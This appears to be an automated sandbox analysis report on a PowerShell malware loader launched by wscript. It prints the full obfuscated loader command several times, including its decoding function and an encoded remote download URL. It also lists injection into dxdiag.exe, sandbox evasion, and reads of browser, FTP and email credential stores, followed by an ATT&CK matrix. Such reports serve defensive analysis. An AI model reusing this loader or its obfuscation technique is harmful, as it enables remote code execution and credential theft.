                Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.3010425134.0000000000D11000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: on.pdb source: powershell.exe, 00000004.00000002.3032733282.0000000007606000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara match File source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
                Source: Yara match File source: 00000004.00000002.3038911552.000000000B1AF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.3038628107.0000000008960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000004.00000002.3026899970.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000002.00000002.2241948302.000002B4370DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Buriers)$global:Meatball189 = [System.Text.Encoding]::ASCII.GetString($Unitarismes)$global:Yasmak=$Meatball189.substring($Frastdtes,$Tracheloclavicular)<#Curtseyed Kuans Unbesot Plud
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Reeker $Hnd109 $Udlignende102), (Delayer @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Chitlin = [AppDomain]::CurrentDomain.GetAssemblies()$global:Eksame
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Horrah)), $Outpoise).DefineDynamicModule($Countably, $false).DefineType($Carle, $Undramatical, [System.MulticastDelegate])$Duehgenes.D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Buriers)$global:Meatball189 = [System.Text.Encoding]::ASCII.GetString($Unitarismes)$global:Yasmak=$Meatball189.substring($Frastdtes,$Tracheloclavicular)<#Curtseyed Kuans Unbesot Plud
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(Jomfru
                Source: 31437F.exe.18.dr Static PE information: 0xA39C6329 [Mon Dec 25 02:00:09 2056 UTC]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CE51D3 pushad ; iretd 2_2_00007FF848CE52B9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848CE00BD pushad ; iretd 2_2_00007FF848CE00C1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_049D370F push eax; iretd 4_2_049D3749
                Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F69F7F push ebp; retf 000Ah 18_3_05F69F84
                Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F68DE7 push ds; retf 18_3_05F68DE8
                Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F695C7 push cs; iretd 18_3_05F695C8
                Source: C:\Windows\SysWOW64\dxdiag.exe Code function: 18_3_05F6B048 push eax; ret 18_3_05F6B049
                Source: C:\Windows\SysWOW64\dxdiag.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exe Process information set: NOGPFAULTERRORBOX

                Malware Analysis System Evasion

                Source: C:\Windows\SysWOW64\dxdiag.exe API/Special instruction interceptor: Address: 53C1D7A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6233
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3630
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6463
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3368
                Source: C:\Windows\SysWOW64\dxdiag.exe Window / User API: threadDelayed 4893
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088 Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 2284 Thread sleep count: 4893 > 30
                Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5280 Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\dxdiag.exe Thread sleep count: Count: 4893 delay: -5
                Source: C:\Windows\SysWOW64\dxdiag.exe Thread delayed: delay time: 60000
                Source: powershell.exe, 00000002.00000002.2210694787.000002B4254F5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005EF8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000012.00000002.3285682620.0000000005F52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.2250232300.000002B43F505000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\dxdiag.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_030CD338 LdrInitializeThunk,LdrInitializeThunk,4_2_030CD338

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: amsi64_3032.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3032, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 6412, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 3200000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\dxdiag.exe base: 2F1FABC
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Kechel Prsidentposten Uigennemsigtighederne #>;$Overdistantly='Interfrontal';<#Gadshill Slaabrokstil Delebrns Porulous Dolkestdet #>;$Vinduesopstninger=$host.PrivateData;If ($Vinduesopstninger) {$Stedlig++;}function Jomfruhindes($Porteranthus){$Aruspex=$Acetnaphthalide+$Porteranthus.Length-$Stedlig;for( $Nytteomraaders=5;$Nytteomraaders -lt $Aruspex;$Nytteomraaders+=6){$Indpresse+=$Porteranthus[$Nytteomraaders];}$Indpresse;}function Electroendosmosis($Rookus){ & ($Bohor) ($Rookus);}$Dinder=Jomfruhindes 'Pac iMEnhjroTretizalkohi.nudelRedillAlfajaFjern/ dopt5She.t. Kaff0 Stoi Anf l(fundaWIslaniStra nLeechdHa aroReshiwF,ifisSemiw UndeNStaveTDesti Affi1.rvty0B myn.Trykk0Diflu;Hi si PolydWCogiti CypenForka6Genda4 Isab; Afst PresnxM elh6Uno n4Yello;Fl,tt steorDesp vdanse: Svi 1Subbi2Fopsc1Lowba.T,mme0Cyto )retri Men GAdenaeUddancAssemk Raggo Afdo/Excl 2 Til 0Psamm1Sadle0 Gri 0.uscl1 Me u0 Org 1 Clay GeskeFPonchiI,currBuh.seKonomfY glioKu,stxFusin/F.rsg1Krush2Demo.1 Fili.Micro0Rad o ';$Amerikanismens=Jomfruhindes ' Br,sUAnpris EiriENedrirUrchi- SulpaFjrteGPreteEDatabN maritQu ru ';$samlsnings=Jomfruhindes 'FantahIliost.adbatUnderpTuttisGiral:Gonor/Etho./ Kom dZoophr NickiA,tagv,ubope Fort. 
DuragHoldnoBrodeoSe,vegSodallFreefeHelve..atiocNeph oElse.mMic,o/nat ouArtotcReemp?RingoeR asyxO,erhpEccafo Or arFornjtMarli=LselidUdvikoOc.oiw.ynton SneklInteroM llea.erskdPr gr&B.esniParasd S et= Bobs1 dammeAnl gx Ud,rF.lockxJagtlLSuddeodec m5StrstDTo glnUne p8 cham7F rsaF le iWHysteQ ,tiks ovacK hypeOFinanFFork 9RizzaGN nsuFFindi6RetaiRspillfModst-Nyoprp UnagH K ipgRadioXHydroqFe apJ Reap8Kyste ';$aesthesia=Jomfruhindes 'Proce>N nna ';$Bohor=Jomfruhindes 'unintIkandiEher iXV,ndf ';$Yammers='Breme';$rytmiseret='\Drgs.Trs';Electroendosmosis (Jomfruhindes 'fa tb$Forskg IsoblSpilloKikonbKjer.aspro l nth:UnimpAOkseblForeilPda oeTrussnHess dFemkaesal.t=Begrl$MiljfeMetron,edriv rill:Glosaa P otpSul mp Pja d ApioaSukketlithoaSluse+ rdig$UdskirEnt tyJentrtHokeymboo.ei ritis Afvieun errbaldreKtex,tsvedj ');Electroendosmosis (Jomfruhindes 'Origi$SwashgUnderlScyl oTes dbWhitmaPersilUdtmm:SvaghTSvrmer La naBo ilcOmg dtberaks onox=Bevrt$Sa lesOegenaDeponmDipetlS,agtsRationBasiliHghsrn Sp cg.nifosPhilo.Tilsks Persp KliplTidspi VivatOpryk(Tre,j$Sty taExen.e Romas dvlgt jollhUdladeUdmatsUntemi eardaUnivo)Cre,s ');Electroendosmosis (Jomfruhindes 'Scot.[KikseNAedeseSkonstLilli.Re isSSkanke ejskr Stenv Vertipla.icSejlae As.rPDec,mo SansimaternAmphitBrynjMHaanda RefonSkiftaHoftegForaaeRagmar .off]Maane:Sa.me:rhopaS TffeeTennicCh,tou ,redr Uncoi ConctOphthyTur eP FrasrPlaygoHenbatGifttoSanitc Snoro Hom lGurge Nylo,=Chizz Pu pu[ GildNplisseDeepet,rape.EncefSparadeStinkc Capsu Tru rDepriiB.mbetstatsyAngelPNehmirStampo.pritt ,ubloElectc.olleoVoldelP eudT,oneayGoba,pFdbfleKryds] Ahnf:Titan:RenovTConarlBrimls blte1Inger2Clina ');$samlsnings=$Tracts[0];$Gaveled=(JomfruJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#kechel prsidentposten uigennemsigtighederne #>;$overdistantly='interfrontal';<#gadshill slaabrokstil delebrns porulous dolkestdet #>;$vinduesopstninger=$host.privatedata;if ($vinduesopstninger) {$stedlig++;}function jomfruhindes($porteranthus){$aruspex=$acetnaphthalide+$porteranthus.length-$stedlig;for( $nytteomraaders=5;$nytteomraaders -lt $aruspex;$nytteomraaders+=6){$indpresse+=$porteranthus[$nytteomraaders];}$indpresse;}function electroendosmosis($rookus){ & ($bohor) ($rookus);}$dinder=jomfruhindes 'pac imenhjrotretizalkohi.nudelredillalfajafjern/ dopt5she.t. kaff0 stoi anf l(fundawislanistra nleechdha aroreshiwf,ifissemiw undenstavetdesti affi1.rvty0b myn.trykk0diflu;hi si polydwcogiti cypenforka6genda4 isab; afst presnxm elh6uno n4yello;fl,tt steordesp vdanse: svi 1subbi2fopsc1lowba.t,mme0cyto )retri men gadenaeuddancassemk raggo afdo/excl 2 til 0psamm1sadle0 gri 0.uscl1 me u0 org 1 clay geskefponchii,currbuh.sekonomfy glioku,stxfusin/f.rsg1krush2demo.1 fili.micro0rad o ';$amerikanismens=jomfruhindes ' br,suanpris eirienedrirurchi- sulpafjrtegpreteedatabn maritqu ru ';$samlsnings=jomfruhindes 'fantahiliost.adbatunderptuttisgiral:gonor/etho./ kom dzoophr nickia,tagv,ubope fort. 
duragholdnobrodeose,vegsodallfreefehelve..atiocneph oelse.mmic,o/nat ouartotcreemp?ringoer asyxo,erhpeccafo or arfornjtmarli=lselidudvikooc.oiw.ynton sneklinterom llea.erskdpr gr&b.esniparasd s et= bobs1 dammeanl gx ud,rf.lockxjagtllsuddeodec m5strstdto glnune p8 cham7f rsaf le iwhysteq ,tiks ovack hypeofinanffork 9rizzagn nsuffindi6retairspillfmodst-nyoprp unagh k ipgradioxhydroqfe apj reap8kyste ';$aesthesia=jomfruhindes 'proce>n nna ';$bohor=jomfruhindes 'unintikandieher ixv,ndf ';$yammers='breme';$rytmiseret='\drgs.trs';electroendosmosis (jomfruhindes 'fa tb$forskg isoblspillokikonbkjer.aspro l nth:unimpaokseblforeilpda oetrussnhess dfemkaesal.t=begrl$miljfemetron,edriv rill:glosaa p otpsul mp pja d apioasukketlithoasluse+ rdig$udskirent tyjentrthokeymboo.ei ritis afvieun errbaldrektex,tsvedj ');electroendosmosis (jomfruhindes 'origi$swashgunderlscyl otes dbwhitmapersiludtmm:svaghtsvrmer la nabo ilcomg dtberaks onox=bevrt$sa lesoegenadeponmdipetls,agtsrationbasilihghsrn sp cg.nifosphilo.tilsks persp klipltidspi vivatopryk(tre,j$sty taexen.e romas dvlgt jollhudladeudmatsuntemi eardaunivo)cre,s ');electroendosmosis (jomfruhindes 'scot.[kiksenaedeseskonstlilli.re issskanke ejskr stenv vertipla.icsejlae as.rpdec,mo sansimaternamphitbrynjmhaanda refonskiftahoftegforaaeragmar .off]maane:sa.me:rhopas tffeetennicch,tou ,redr uncoi conctophthytur ep frasrplaygohenbatgifttosanitc snoro hom lgurge nylo,=chizz pu pu[ gildnplissedeepet,rape.encefsparadestinkc capsu tru rdepriib.mbetstatsyangelpnehmirstampo.pritt ,ubloelectc.olleovoldelp eudt,oneaygoba,pfdbflekryds] ahnf:titan:renovtconarlbrimls blte1inger2clina ');$samlsnings=$tracts[0];$gaveled=(jomfru
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: dump.pcap, type: PCAP
                Source: Yara match; File source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\dxdiag.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Windows\SysWOW64\dxdiag.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Windows\SysWOW64\dxdiag.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\dxdiag.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Windows\SysWOW64\dxdiag.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Windows\SysWOW64\dxdiag.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Source: C:\Windows\SysWOW64\dxdiag.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Windows\SysWOW64\dxdiag.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

                Remote Access Functionality

                Source: Yara match; File source: dump.pcap, type: PCAP
                Source: Yara match; File source: Process Memory Space: dxdiag.exe PID: 2072, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | 11 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 11 Scripting | 1 DLL Side-Loading | 1 Obfuscated Files or Information | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 111 Process Injection | 1 Software Packing | 1 Credentials in Registry | 114 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 Timestomp | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
